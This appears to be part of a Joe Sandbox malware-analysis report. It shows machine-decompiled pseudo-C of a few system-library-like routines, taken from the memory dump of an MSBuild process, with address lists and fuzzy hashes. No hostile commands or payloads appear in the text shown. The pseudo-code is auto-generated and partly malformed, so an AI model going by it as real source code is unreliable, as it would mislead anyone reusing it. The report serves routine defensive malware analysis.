                                            0x01060e84
                                            0x01060e88
                                            0x01060e8a
                                            0x01060e8d
                                            0x01060e9e
                                            0x01060ea3
                                            0x01060ea3
                                            0x01060ea7
                                            0x01060eaf
                                            0x01060eb3
                                            0x01060eb9
                                            0x01060eb9
                                            0x01060ebc
                                            0x01060ecd
                                            0x01060ecd
                                            0x00000000
                                            0x01060eb3
                                            0x01060e21
                                            0x01060e2b
                                            0x01060e2f
                                            0x01060e30
                                            0x01060e3a
                                            0x01060e3f
                                            0x01060e41
                                            0x00000000
                                            0x00000000
                                            0x01060e47
                                            0x00000000
                                            0x01060e47
                                            0x01060df9
                                            0x01060dfe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01060dfe
                                            0x01005303
                                            0x01005307
                                            0x00000000
                                            0x01005309
                                            0x00000000
                                            0x01005309
                                            0x01005307
                                            0x010052e9
                                            0x010052e9
                                            0x00000000
                                            0x010052e9
                                            0x0100530e
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3651e0aac9b763c67b7556d3239500d724a291d556ab0a96985c0a75ecf31a8e
                                            • Instruction ID: c8e1e699cfc6967fcf11ed0daef0c06a5c510de6ce153ace7b463ea2f1828d9e
                                            • Opcode Fuzzy Hash: 3651e0aac9b763c67b7556d3239500d724a291d556ab0a96985c0a75ecf31a8e
                                            • Instruction Fuzzy Hash: 9B51BC701457429BE722DF68C841B6BBBE8FFA4710F10492EF5D587A91E774E840CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01032AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                            				signed short* _v8;
                                            				signed short* _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr* _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				short _t56;
                                            				signed int _t57;
                                            				intOrPtr _t58;
                                            				signed short* _t61;
                                            				intOrPtr _t72;
                                            				intOrPtr _t75;
                                            				intOrPtr _t84;
                                            				intOrPtr _t87;
                                            				intOrPtr* _t90;
                                            				signed short* _t91;
                                            				signed int _t95;
                                            				signed short* _t96;
                                            				intOrPtr _t97;
                                            				intOrPtr _t102;
                                            				signed int _t108;
                                            				intOrPtr _t110;
                                            				signed int _t111;
                                            				signed short* _t112;
                                            				void* _t113;
                                            				signed int _t116;
                                            				signed short** _t119;
                                            				short* _t120;
                                            				signed int _t123;
                                            				signed int _t124;
                                            				void* _t125;
                                            				intOrPtr _t127;
                                            				signed int _t128;
                                            
                                            				_t90 = __ecx;
                                            				_v16 = __edx;
                                            				_t108 = _a4;
                                            				_v28 = __ecx;
                                            				_t4 = _t108 - 1; // -1
                                            				if(_t4 > 0x13) {
                                            					L15:
                                            					_t56 = 0xc0000100;
                                            					L16:
                                            					return _t56;
                                            				}
                                            				_t57 = _t108 * 0x1c;
                                            				_v32 = _t57;
                                            				_t6 = _t57 + 0x10f8204; // 0x0
                                            				_t123 =  *_t6;
                                            				_t7 = _t57 + 0x10f8208; // 0x10f8207
                                            				_t8 = _t57 + 0x10f8208; // 0x10f8207
                                            				_t119 = _t8;
                                            				_v36 = _t123;
                                            				_t110 = _t7 + _t123 * 8;
                                            				_v24 = _t110;
                                            				_t111 = _a4;
                                            				if(_t119 >= _t110) {
                                            					L12:
                                            					if(_t123 != 3) {
                                            						_t58 =  *0x10f8450; // 0x0
                                            						if(_t58 == 0) {
                                            							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                            						}
                                            					} else {
                                            						_t26 = _t57 + 0x10f821c; // 0x0
                                            						_t58 =  *_t26;
                                            					}
                                            					 *_t90 = _t58;
                                            					goto L15;
                                            				} else {
                                            					goto L2;
                                            				}
                                            				while(1) {
                                            					_t116 =  *_t61 & 0x0000ffff;
                                            					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                            					if(_t116 == _t128) {
                                            						goto L18;
                                            					}
                                            					L5:
                                            					if(_t116 >= 0x61) {
                                            						if(_t116 > 0x7a) {
                                            							_t97 =  *0x10f6d5c; // 0xfeff0654
                                            							_t72 =  *0x10f6d5c; // 0xfeff0654
                                            							_t75 =  *0x10f6d5c; // 0xfeff0654
                                            							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                            						} else {
                                            							_t116 = _t116 - 0x20;
                                            						}
                                            					}
                                            					if(_t128 >= 0x61) {
                                            						if(_t128 > 0x7a) {
                                            							_t102 =  *0x10f6d5c; // 0xfeff0654
                                            							_t84 =  *0x10f6d5c; // 0xfeff0654
                                            							_t87 =  *0x10f6d5c; // 0xfeff0654
                                            							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                            						} else {
                                            							_t128 = _t128 - 0x20;
                                            						}
                                            					}
                                            					if(_t116 == _t128) {
                                            						_t61 = _v12;
                                            						_t96 = _v8;
                                            					} else {
                                            						_t113 = _t116 - _t128;
                                            						L9:
                                            						_t111 = _a4;
                                            						if(_t113 == 0) {
                                            							_t115 =  &(( *_t119)[_t111 + 1]);
                                            							_t33 =  &(_t119[1]); // 0x100
                                            							_t120 = _a8;
                                            							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                            							_t35 = _t95 - 1; // 0xff
                                            							_t124 = _t35;
                                            							if(_t120 == 0) {
                                            								L27:
                                            								 *_a16 = _t95;
                                            								_t56 = 0xc0000023;
                                            								goto L16;
                                            							}
                                            							if(_t124 >= _a12) {
                                            								if(_a12 >= 1) {
                                            									 *_t120 = 0;
                                            								}
                                            								goto L27;
                                            							}
                                            							 *_a16 = _t124;
                                            							_t125 = _t124 + _t124;
                                            							E0104F3E0(_t120, _t115, _t125);
                                            							_t56 = 0;
                                            							 *((short*)(_t125 + _t120)) = 0;
                                            							goto L16;
                                            						}
                                            						_t119 =  &(_t119[2]);
                                            						if(_t119 < _v24) {
                                            							L2:
                                            							_t91 =  *_t119;
                                            							_t61 = _t91;
                                            							_v12 = _t61;
                                            							_t112 =  &(_t61[_t111]);
                                            							_v8 = _t112;
                                            							if(_t61 >= _t112) {
                                            								break;
                                            							} else {
                                            								_t127 = _v16 - _t91;
                                            								_t96 = _t112;
                                            								_v20 = _t127;
                                            								_t116 =  *_t61 & 0x0000ffff;
                                            								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                            								if(_t116 == _t128) {
                                            									goto L18;
                                            								}
                                            								goto L5;
                                            							}
                                            						} else {
                                            							_t90 = _v28;
                                            							_t57 = _v32;
                                            							_t123 = _v36;
                                            							goto L12;
                                            						}
                                            					}
                                            					L18:
                                            					_t61 =  &(_t61[1]);
                                            					_v12 = _t61;
                                            					if(_t61 >= _t96) {
                                            						break;
                                            					}
                                            					_t127 = _v20;
                                            				}
                                            				_t113 = 0;
                                            				goto L9;
                                            			}






































                                            0x01032ae4
                                            0x01032aec
                                            0x01032aef
                                            0x01032af4
                                            0x01032af7
                                            0x01032afd
                                            0x01032b92
                                            0x01032b92
                                            0x01032b97
                                            0x01032b9c
                                            0x01032b9c
                                            0x01032b03
                                            0x01032b06
                                            0x01032b09
                                            0x01032b09
                                            0x01032b0f
                                            0x01032b15
                                            0x01032b15
                                            0x01032b1b
                                            0x01032b1e
                                            0x01032b21
                                            0x01032b26
                                            0x01032b29
                                            0x01032b81
                                            0x01032b84
                                            0x01032c0e
                                            0x01032c15
                                            0x01032c24
                                            0x01032c24
                                            0x01032b8a
                                            0x01032b8a
                                            0x01032b8a
                                            0x01032b8a
                                            0x01032b90
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01032b4a
                                            0x01032b4a
                                            0x01032b4d
                                            0x01032b53
                                            0x00000000
                                            0x00000000
                                            0x01032b55
                                            0x01032b58
                                            0x01032bb7
                                            0x01075d1b
                                            0x01075d37
                                            0x01075d47
                                            0x01075d53
                                            0x01032bbd
                                            0x01032bbd
                                            0x01032bbd
                                            0x01032bb7
                                            0x01032b5d
                                            0x01032c2f
                                            0x01075d5b
                                            0x01075d77
                                            0x01075d87
                                            0x01075d93
                                            0x01032c35
                                            0x01032c35
                                            0x01032c35
                                            0x01032c2f
                                            0x01032b65
                                            0x01032b9f
                                            0x01032ba2
                                            0x01032b67
                                            0x01032b67
                                            0x01032b69
                                            0x01032b6b
                                            0x01032b6e
                                            0x01032bc9
                                            0x01032bcc
                                            0x01032bcf
                                            0x01032bd4
                                            0x01032bd6
                                            0x01032bd6
                                            0x01032bdb
                                            0x01032c02
                                            0x01032c05
                                            0x01032c07
                                            0x00000000
                                            0x01032c07
                                            0x01032be0
                                            0x01032c00
                                            0x01032c3f
                                            0x01032c3f
                                            0x00000000
                                            0x01032c00
                                            0x01032be5
                                            0x01032be7
                                            0x01032bec
                                            0x01032bf4
                                            0x01032bf6
                                            0x00000000
                                            0x01032bf6
                                            0x01032b70
                                            0x01032b76
                                            0x01032b2b
                                            0x01032b2b
                                            0x01032b2d
                                            0x01032b2f
                                            0x01032b32
                                            0x01032b35
                                            0x01032b3a
                                            0x00000000
                                            0x01032b40
                                            0x01032b43
                                            0x01032b45
                                            0x01032b47
                                            0x01032b4a
                                            0x01032b4d
                                            0x01032b53
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01032b53
                                            0x01032b78
                                            0x01032b78
                                            0x01032b7b
                                            0x01032b7e
                                            0x00000000
                                            0x01032b7e
                                            0x01032b76
                                            0x01032ba5
                                            0x01032ba5
                                            0x01032ba8
                                            0x01032bad
                                            0x00000000
                                            0x00000000
                                            0x01032baf
                                            0x01032baf
                                            0x01032bc2
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 658c46153ddf7db7abc8820f8af114061b3377f72c8faf7a90e4d1ddeda9c47a
                                            • Instruction ID: b54ff68bf9c6b28bd13d92da771bd037bc3a024dfe9c2f5639fae1c423dc9737
                                            • Opcode Fuzzy Hash: 658c46153ddf7db7abc8820f8af114061b3377f72c8faf7a90e4d1ddeda9c47a
                                            • Instruction Fuzzy Hash: 0351BF76A00125CFCB18DF1CC8819BDB7B9FBC870071A845AE8C69B765D735AE91CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E010CAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				void* __esi;
                                            				void* __ebp;
                                            				signed short* _t36;
                                            				signed int _t41;
                                            				char* _t42;
                                            				intOrPtr _t43;
                                            				signed int _t47;
                                            				void* _t52;
                                            				signed int _t57;
                                            				intOrPtr _t61;
                                            				signed char _t62;
                                            				signed int _t72;
                                            				signed char _t85;
                                            				signed int _t88;
                                            
                                            				_t73 = __edx;
                                            				_push(__ecx);
                                            				_t85 = __ecx;
                                            				_v8 = __edx;
                                            				_t61 =  *((intOrPtr*)(__ecx + 0x28));
                                            				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
                                            				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
                                            					_t57 = _t57 | 0x00000001;
                                            				}
                                            				_t88 = 0;
                                            				_t36 = 0;
                                            				_t96 = _a12;
                                            				if(_a12 == 0) {
                                            					_t62 = _a8;
                                            					__eflags = _t62;
                                            					if(__eflags == 0) {
                                            						goto L12;
                                            					}
                                            					_t52 = E010CC38B(_t85, _t73, _t57, 0);
                                            					_t62 = _a8;
                                            					 *_t62 = _t52;
                                            					_t36 = 0;
                                            					goto L11;
                                            				} else {
                                            					_t36 = E010CACFD(_t85, _t73, _t96, _t57, _a8);
                                            					if(0 == 0 || 0 == 0xffffffff) {
                                            						_t72 = _t88;
                                            					} else {
                                            						_t72 =  *0x00000000 & 0x0000ffff;
                                            					}
                                            					 *_a12 = _t72;
                                            					_t62 = _a8;
                                            					L11:
                                            					_t73 = _v8;
                                            					L12:
                                            					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
                                            						L19:
                                            						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
                                            							L22:
                                            							_t74 = _v8;
                                            							__eflags = _v8;
                                            							if(__eflags != 0) {
                                            								L25:
                                            								__eflags = _t88 - 2;
                                            								if(_t88 != 2) {
                                            									__eflags = _t85 + 0x44 + (_t88 << 6);
                                            									_t88 = E010CFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
                                            									goto L34;
                                            								}
                                            								L26:
                                            								_t59 = _v8;
                                            								E010CEA55(_t85, _v8, _t57);
                                            								asm("sbb esi, esi");
                                            								_t88 =  ~_t88;
                                            								_t41 = E01027D50();
                                            								__eflags = _t41;
                                            								if(_t41 == 0) {
                                            									_t42 = 0x7ffe0380;
                                            								} else {
                                            									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            								}
                                            								__eflags =  *_t42;
                                            								if( *_t42 != 0) {
                                            									_t43 =  *[fs:0x30];
                                            									__eflags =  *(_t43 + 0x240) & 0x00000001;
                                            									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
                                            										__eflags = _t88;
                                            										if(_t88 != 0) {
                                            											E010C1608(_t85, _t59, 3);
                                            										}
                                            									}
                                            								}
                                            								goto L34;
                                            							}
                                            							_push(_t62);
                                            							_t47 = E010D1536(0x10f8ae4, (_t74 -  *0x10f8b04 >> 0x14) + (_t74 -  *0x10f8b04 >> 0x14), _t88, __eflags);
                                            							__eflags = _t47;
                                            							if(_t47 == 0) {
                                            								goto L26;
                                            							}
                                            							_t74 = _v12;
                                            							_t27 = _t47 - 1; // -1
                                            							_t88 = _t27;
                                            							goto L25;
                                            						}
                                            						_t62 = _t85;
                                            						if(L010CC323(_t62, _v8, _t57) != 0xffffffff) {
                                            							goto L22;
                                            						}
                                            						_push(_t62);
                                            						_push(_t88);
                                            						E010CA80D(_t85, 9, _v8, _t88);
                                            						goto L34;
                                            					} else {
                                            						_t101 = _t36;
                                            						if(_t36 != 0) {
                                            							L16:
                                            							if(_t36 == 0xffffffff) {
                                            								goto L19;
                                            							}
                                            							_t62 =  *((intOrPtr*)(_t36 + 2));
                                            							if((_t62 & 0x0000000f) == 0) {
                                            								goto L19;
                                            							}
                                            							_t62 = _t62 & 0xf;
                                            							if(E010ACB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
                                            								L34:
                                            								return _t88;
                                            							}
                                            							goto L19;
                                            						}
                                            						_t62 = _t85;
                                            						_t36 = E010CACFD(_t62, _t73, _t101, _t57, _t62);
                                            						if(_t36 == 0) {
                                            							goto L19;
                                            						}
                                            						goto L16;
                                            					}
                                            				}
                                            			}



















                                            0x010cae44
                                            0x010cae4c
                                            0x010cae53
                                            0x010cae55
                                            0x010cae5c
                                            0x010cae64
                                            0x010cae68
                                            0x010cae75
                                            0x010cae75
                                            0x010cae78
                                            0x010cae7a
                                            0x010cae7c
                                            0x010cae7f
                                            0x010caea8
                                            0x010caeab
                                            0x010caead
                                            0x00000000
                                            0x00000000
                                            0x010caeb3
                                            0x010caeb8
                                            0x010caebb
                                            0x010caebd
                                            0x00000000
                                            0x010cae81
                                            0x010cae88
                                            0x010cae8f
                                            0x010cae9b
                                            0x010cae96
                                            0x010cae96
                                            0x010cae96
                                            0x010caea0
                                            0x010caea3
                                            0x010caebf
                                            0x010caebf
                                            0x010caec3
                                            0x010caec9
                                            0x010caf0d
                                            0x010caf14
                                            0x010caf3d
                                            0x010caf3d
                                            0x010caf41
                                            0x010caf44
                                            0x010caf67
                                            0x010caf67
                                            0x010caf6a
                                            0x010cafca
                                            0x010cafd1
                                            0x00000000
                                            0x010cafd1
                                            0x010caf6c
                                            0x010caf6d
                                            0x010caf75
                                            0x010caf7c
                                            0x010caf7e
                                            0x010caf80
                                            0x010caf85
                                            0x010caf87
                                            0x010caf99
                                            0x010caf89
                                            0x010caf92
                                            0x010caf92
                                            0x010caf9e
                                            0x010cafa1
                                            0x010cafa3
                                            0x010cafa9
                                            0x010cafb0
                                            0x010cafb2
                                            0x010cafb4
                                            0x010cafbc
                                            0x010cafbc
                                            0x010cafb4
                                            0x010cafb0
                                            0x00000000
                                            0x010cafa1
                                            0x010caf4f
                                            0x010caf57
                                            0x010caf5c
                                            0x010caf5e
                                            0x00000000
                                            0x00000000
                                            0x010caf60
                                            0x010caf64
                                            0x010caf64
                                            0x00000000
                                            0x010caf64
                                            0x010caf1a
                                            0x010caf25
                                            0x00000000
                                            0x00000000
                                            0x010caf27
                                            0x010caf28
                                            0x010caf33
                                            0x00000000
                                            0x010caed0
                                            0x010caed0
                                            0x010caed2
                                            0x010caee1
                                            0x010caee4
                                            0x00000000
                                            0x00000000
                                            0x010caee6
                                            0x010caeec
                                            0x00000000
                                            0x00000000
                                            0x010caefb
                                            0x010caf07
                                            0x010cafd3
                                            0x010cafdb
                                            0x010cafdb
                                            0x00000000
                                            0x010caf07
                                            0x010caed6
                                            0x010caed8
                                            0x010caedf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010caedf
                                            0x010caec9

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac1a2b08e06ce53b360f388ac05e443d00bcc48350cba07e80c2b62b25c1a582
                                            • Instruction ID: 0dc808dc34526f1aea6f3a8cfa88d510a6a90cc9d49a0f5de3a4a3c85becb4bb
                                            • Opcode Fuzzy Hash: ac1a2b08e06ce53b360f388ac05e443d00bcc48350cba07e80c2b62b25c1a582
                                            • Instruction Fuzzy Hash: D341F87170021ADBD7269B69C894B7FB7D9AF84B10F04425DF996872D1E774D802CEA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0102DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				char _v5;
                                            				signed int _v12;
                                            				signed int* _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				intOrPtr _v44;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed int _t54;
                                            				char* _t58;
                                            				signed int _t66;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				intOrPtr _t72;
                                            				intOrPtr _t73;
                                            				signed int* _t75;
                                            				intOrPtr _t79;
                                            				intOrPtr _t80;
                                            				char _t82;
                                            				signed int _t83;
                                            				signed int _t84;
                                            				signed int _t88;
                                            				signed int _t89;
                                            				intOrPtr _t90;
                                            				intOrPtr _t92;
                                            				signed int _t97;
                                            				intOrPtr _t98;
                                            				intOrPtr* _t99;
                                            				signed int* _t101;
                                            				signed int* _t102;
                                            				intOrPtr* _t103;
                                            				intOrPtr _t105;
                                            				signed int _t106;
                                            				void* _t118;
                                            
                                            				_t92 = __edx;
                                            				_t75 = _a4;
                                            				_t98 = __ecx;
                                            				_v44 = __edx;
                                            				_t106 = _t75[1];
                                            				_v40 = __ecx;
                                            				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                            					_t82 = 0;
                                            				} else {
                                            					_t82 = 1;
                                            				}
                                            				_v5 = _t82;
                                            				_t6 = _t98 + 0xc8; // 0xc9
                                            				_t101 = _t6;
                                            				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                            				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                            				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                            				if(_t82 != 0) {
                                            					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                            					_t83 =  *_t75;
                                            					_t54 = _t75[1];
                                            					 *_t101 = _t83;
                                            					_t84 = _t83 | _t54;
                                            					_t101[1] = _t54;
                                            					if(_t84 == 0) {
                                            						_t101[1] = _t101[1] & _t84;
                                            						 *_t101 = 1;
                                            					}
                                            					goto L19;
                                            				} else {
                                            					if(_t101 == 0) {
                                            						E0100CC50(E01004510(0xc000000d));
                                            						_t88 =  *_t101;
                                            						_t97 = _t101[1];
                                            						L15:
                                            						_v12 = _t88;
                                            						_t66 = _t88 -  *_t75;
                                            						_t89 = _t97;
                                            						asm("sbb ecx, [ebx+0x4]");
                                            						_t118 = _t89 - _t97;
                                            						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                            							_t66 = _t66 | 0xffffffff;
                                            							_t89 = 0x7fffffff;
                                            						}
                                            						 *_t101 = _t66;
                                            						_t101[1] = _t89;
                                            						L19:
                                            						if(E01027D50() != 0) {
                                            							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t58 = 0x7ffe0386;
                                            						}
                                            						_t102 = _v16;
                                            						if( *_t58 != 0) {
                                            							_t58 = E010D8ED6(_t102, _t98);
                                            						}
                                            						_t76 = _v44;
                                            						E01022280(_t58, _v44);
                                            						E0102DD82(_v44, _t102, _t98);
                                            						E0102B944(_t102, _v5);
                                            						return E0101FFB0(_t76, _t98, _t76);
                                            					}
                                            					_t99 = 0x7ffe03b0;
                                            					do {
                                            						_t103 = 0x7ffe0010;
                                            						do {
                                            							_t67 =  *0x10f8628; // 0x0
                                            							_v28 = _t67;
                                            							_t68 =  *0x10f862c; // 0x0
                                            							_v32 = _t68;
                                            							_v24 =  *((intOrPtr*)(_t99 + 4));
                                            							_v20 =  *_t99;
                                            							while(1) {
                                            								_t97 =  *0x7ffe000c;
                                            								_t90 =  *0x7FFE0008;
                                            								if(_t97 ==  *_t103) {
                                            									goto L10;
                                            								}
                                            								asm("pause");
                                            							}
                                            							L10:
                                            							_t79 = _v24;
                                            							_t99 = 0x7ffe03b0;
                                            							_v12 =  *0x7ffe03b0;
                                            							_t72 =  *0x7FFE03B4;
                                            							_t103 = 0x7ffe0010;
                                            							_v36 = _t72;
                                            						} while (_v20 != _v12 || _t79 != _t72);
                                            						_t73 =  *0x10f8628; // 0x0
                                            						_t105 = _v28;
                                            						_t80 =  *0x10f862c; // 0x0
                                            					} while (_t105 != _t73 || _v32 != _t80);
                                            					_t98 = _v40;
                                            					asm("sbb edx, [ebp-0x20]");
                                            					_t88 = _t90 - _v12 - _t105;
                                            					_t75 = _a4;
                                            					asm("sbb edx, eax");
                                            					_t31 = _t98 + 0xc8; // 0x10cfb53
                                            					_t101 = _t31;
                                            					 *_t101 = _t88;
                                            					_t101[1] = _t97;
                                            					goto L15;
                                            				}
                                            			}









































                                            0x0102dbe9
                                            0x0102dbf2
                                            0x0102dbf7
                                            0x0102dbf9
                                            0x0102dbfc
                                            0x0102dc00
                                            0x0102dc03
                                            0x0102dc14
                                            0x0102dd54
                                            0x0102dd54
                                            0x0102dd54
                                            0x0102dc18
                                            0x0102dc1d
                                            0x0102dc1d
                                            0x0102dc32
                                            0x0102dc3b
                                            0x0102dc3e
                                            0x0102dc46
                                            0x0102dd5b
                                            0x0102dd62
                                            0x0102dd64
                                            0x0102dd67
                                            0x0102dd69
                                            0x0102dd6b
                                            0x0102dd6e
                                            0x0102dd70
                                            0x0102dd73
                                            0x0102dd73
                                            0x00000000
                                            0x0102dc4c
                                            0x0102dc4e
                                            0x01073ae3
                                            0x01073ae8
                                            0x01073aea
                                            0x0102dce7
                                            0x0102dce9
                                            0x0102dcec
                                            0x0102dcee
                                            0x0102dcf0
                                            0x0102dcf3
                                            0x0102dcf5
                                            0x01073af2
                                            0x01073af5
                                            0x01073af5
                                            0x0102dd06
                                            0x0102dd08
                                            0x0102dd0b
                                            0x0102dd12
                                            0x01073b08
                                            0x0102dd18
                                            0x0102dd18
                                            0x0102dd18
                                            0x0102dd20
                                            0x0102dd23
                                            0x01073b16
                                            0x01073b16
                                            0x0102dd29
                                            0x0102dd2d
                                            0x0102dd36
                                            0x0102dd40
                                            0x0102dd51
                                            0x0102dd51
                                            0x0102dc54
                                            0x0102dc59
                                            0x0102dc59
                                            0x0102dc5e
                                            0x0102dc5e
                                            0x0102dc63
                                            0x0102dc66
                                            0x0102dc6b
                                            0x0102dc78
                                            0x0102dc7b
                                            0x0102dc81
                                            0x0102dc81
                                            0x0102dc83
                                            0x0102dc89
                                            0x00000000
                                            0x00000000
                                            0x0102dd7b
                                            0x0102dd7b
                                            0x0102dc8f
                                            0x0102dc8f
                                            0x0102dc92
                                            0x0102dc99
                                            0x0102dc9f
                                            0x0102dca5
                                            0x0102dcaa
                                            0x0102dcaa
                                            0x0102dcb3
                                            0x0102dcb8
                                            0x0102dcbb
                                            0x0102dcc1
                                            0x0102dccf
                                            0x0102dcd2
                                            0x0102dcd5
                                            0x0102dcd7
                                            0x0102dcda
                                            0x0102dcdc
                                            0x0102dcdc
                                            0x0102dce2
                                            0x0102dce4
                                            0x00000000
                                            0x0102dce4

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b830bfa39e3ecc8cc8858452a08ec897f93eb393c886c72c89be990537068c6
                                            • Instruction ID: 7d4e0ea1ca8ec6bd75849ad5aabde355f3e1e60aed6c2e43fba0ee60ebc81860
                                            • Opcode Fuzzy Hash: 2b830bfa39e3ecc8cc8858452a08ec897f93eb393c886c72c89be990537068c6
                                            • Instruction Fuzzy Hash: 7551A171E0162ADFCB15DFA8C480AAEFBF1BF48310F24819AD595AB345DB71AD44CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E0101EF40(intOrPtr __ecx) {
                                            				char _v5;
                                            				char _v6;
                                            				char _v7;
                                            				char _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t58;
                                            				char _t59;
                                            				signed char _t69;
                                            				void* _t73;
                                            				signed int _t74;
                                            				char _t79;
                                            				signed char _t81;
                                            				signed int _t85;
                                            				signed int _t87;
                                            				intOrPtr _t90;
                                            				signed char* _t91;
                                            				void* _t92;
                                            				signed int _t94;
                                            				void* _t96;
                                            
                                            				_t90 = __ecx;
                                            				_v16 = __ecx;
                                            				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                            					_t58 =  *((intOrPtr*)(__ecx));
                                            					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                            						E01009080(_t73, __ecx, __ecx, _t92);
                                            					}
                                            				}
                                            				_t74 = 0;
                                            				_t96 =  *0x7ffe036a - 1;
                                            				_v12 = 0;
                                            				_v7 = 0;
                                            				if(_t96 > 0) {
                                            					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                            					_v12 = _t74;
                                            					_v7 = _t96 != 0;
                                            				}
                                            				_t79 = 0;
                                            				_v8 = 0;
                                            				_v5 = 0;
                                            				while(1) {
                                            					L4:
                                            					_t59 = 1;
                                            					L5:
                                            					while(1) {
                                            						if(_t59 == 0) {
                                            							L12:
                                            							_t21 = _t90 + 4; // 0x7709c21e
                                            							_t87 =  *_t21;
                                            							_v6 = 0;
                                            							if(_t79 != 0) {
                                            								if((_t87 & 0x00000002) != 0) {
                                            									goto L19;
                                            								}
                                            								if((_t87 & 0x00000001) != 0) {
                                            									_v6 = 1;
                                            									_t74 = _t87 ^ 0x00000003;
                                            								} else {
                                            									_t51 = _t87 - 2; // -2
                                            									_t74 = _t51;
                                            								}
                                            								goto L15;
                                            							} else {
                                            								if((_t87 & 0x00000001) != 0) {
                                            									_v6 = 1;
                                            									_t74 = _t87 ^ 0x00000001;
                                            								} else {
                                            									_t26 = _t87 - 4; // -4
                                            									_t74 = _t26;
                                            									if((_t74 & 0x00000002) == 0) {
                                            										_t74 = _t74 - 2;
                                            									}
                                            								}
                                            								L15:
                                            								if(_t74 == _t87) {
                                            									L19:
                                            									E01002D8A(_t74, _t90, _t87, _t90);
                                            									_t74 = _v12;
                                            									_v8 = 1;
                                            									if(_v7 != 0 && _t74 > 0x64) {
                                            										_t74 = _t74 - 1;
                                            										_v12 = _t74;
                                            									}
                                            									_t79 = _v5;
                                            									goto L4;
